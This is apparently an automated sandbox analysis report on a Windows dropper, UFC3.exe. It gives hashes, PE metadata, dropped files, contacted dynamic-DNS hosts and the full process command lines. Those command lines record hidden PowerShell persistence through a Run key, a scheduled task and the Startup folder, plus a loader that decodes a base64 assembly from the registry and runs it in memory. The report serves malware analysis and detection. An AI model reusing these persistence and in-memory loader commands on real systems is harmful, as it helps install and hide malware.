analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

UFC3.exe

Full analysis: https://app.any.run/tasks/7d401e44-9945-48a7-8ea9-7b001dd75ca0
Verdict: Malicious activity
Analysis date: December 02, 2019, 20:12:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

56D60067A3954C0FBDF462A67B0F5CE7

SHA1:

DACB937FDE645E423C626E49BA168A73BD4BCE7A

SHA256:

6BEB90BD87DCD380BA95E9DD5F824CAAFB6F4AC4BEF717BE9C763C30B02FF6D4

SSDEEP:

6144:SZiBR64D1hReBRDXdjcUf5+KfmlqSHI8wFySjrh0Shi6t:7BVDrwBpXdwY8KkqSHXwFh1bHt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 788)
    • Changes the autorun value in the registry

      • powershell.exe (PID: 2924)
    • Writes to a start menu file

      • powershell.exe (PID: 3816)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3272)
  • SUSPICIOUS

    • Executes scripts

      • UFC3.exe (PID: 2468)
      • powershell.exe (PID: 1328)
    • Executes PowerShell scripts

      • WScript.exe (PID: 2156)
      • wscript.exe (PID: 3804)
    • Creates files in the user directory

      • powershell.exe (PID: 1328)
      • powershell.exe (PID: 2924)
      • powershell.exe (PID: 788)
      • powershell.exe (PID: 3816)
      • powershell.exe (PID: 2428)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: -
OSVersion: 5.1
EntryPoint: 0x1e229
UninitializedDataSize: -
InitializedDataSize: 207360
CodeSize: 198144
LinkerVersion: 14
PEType: PE32
TimeStamp: 2019:09:22 16:25:58+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 22-Sep-2019 14:25:58
Detected languages:
  • English - United States
Debug artifacts:
  • D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000118

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 6
Time date stamp: 22-Sep-2019 14:25:58
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x000305E5
0x00030600
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.70257
.rdata
0x00032000
0x0000A392
0x0000A400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.23938
.data
0x0003D000
0x000238B0
0x00001200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3.82783
.gfids
0x00061000
0x000000E8
0x00000200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
2.0896
.rsrc
0x00062000
0x000026F3
0x00002800
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
4.04491
.reloc
0x00065000
0x00002128
0x00002200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
6.60451

Resources

Title
Entropy
Size
Codepage
Language
Type
1
5.25329
1875
UNKNOWN
English - United States
RT_MANIFEST
7
3.1586
482
UNKNOWN
English - United States
RT_STRING
8
3.11685
460
UNKNOWN
English - United States
RT_STRING
9
3.11236
440
UNKNOWN
English - United States
RT_STRING
10
2.99727
326
UNKNOWN
English - United States
RT_STRING
11
3.2036
1094
UNKNOWN
English - United States
RT_STRING
12
3.12889
358
UNKNOWN
English - United States
RT_STRING
13
2.95673
288
UNKNOWN
English - United States
RT_STRING
14
2.94627
266
UNKNOWN
English - United States
RT_STRING
15
2.83619
188
UNKNOWN
English - United States
RT_STRING

Imports

KERNEL32.dll
USER32.dll (delay-loaded)
gdiplus.dll
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
9
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start ufc3.exe no specs wscript.exe no specs powershell.exe no specs wscript.exe no specs powershell.exe powershell.exe no specs powershell.exe schtasks.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2468"C:\Users\admin\AppData\Local\Temp\UFC3.exe" C:\Users\admin\AppData\Local\Temp\UFC3.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2156"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\DirectX.js" C:\Windows\System32\WScript.exeUFC3.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1328"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('Public')+'\DirectX.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\DirectX.js'));wscript 'C:\Users\Public\DirectX.js'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3804"C:\Windows\system32\wscript.exe" C:\Users\Public\DirectX.jsC:\Windows\system32\wscript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2924"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'DirectX' -value 'C:\Users\Public\DirectX.js' -PropertyType String -Force;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
788"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "schtasks /create /sc minute /mo 45 /tn DirectX /tr 'C:\Users\Public\DirectX.js'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3816"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\DirectX.js',[System.IO.File]::ReadAllText('C:\Users\Public\DirectX.js'))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3272"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 45 /tn DirectX /tr C:\Users\Public\DirectX.jsC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2428"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'DirectX').DirectX;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 622
Read events
1 334
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
10
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
1328powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36XDK1EV7WEA2DE5HYOP.temp
MD5:
SHA256:
788powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BOJ7HTEHHU9K4LFYT2SP.temp
MD5:
SHA256:
3816powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SWEIP5WJX6KPIDYAGSN1.temp
MD5:
SHA256:
2924powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZEHVZ1JH0W0JOO8NYOBS.temp
MD5:
SHA256:
2428powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0NCKYPE8E9ECAYDOMT3S.temp
MD5:
SHA256:
3816powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DirectX.jstext
MD5:A1754EED65EBAE8D4623CAD488AC440F
SHA256:46286E219BA9C94F5F222D33614722398A0C5E346FCA359834BB06D5B7C0052A
3816powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b30e.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1328powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1328powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39ac38.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2428powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
4
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
141.255.158.112:3333
blackmirror.ddns.net
Lost Oasis SARL
NL
unknown
2428
powershell.exe
141.255.145.32:3333
blckmrr.duckdns.org
Lost Oasis SARL
NL
unknown

DNS requests

Domain
IP
Reputation
blckmrr.duckdns.org
  • 141.255.145.32
unknown
dns.msftncsi.com
  • 131.107.255.255
shared
blackmirror.ddns.net
  • 141.255.158.112
unknown

Threats

PID
Process
Class
Message
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
No debug info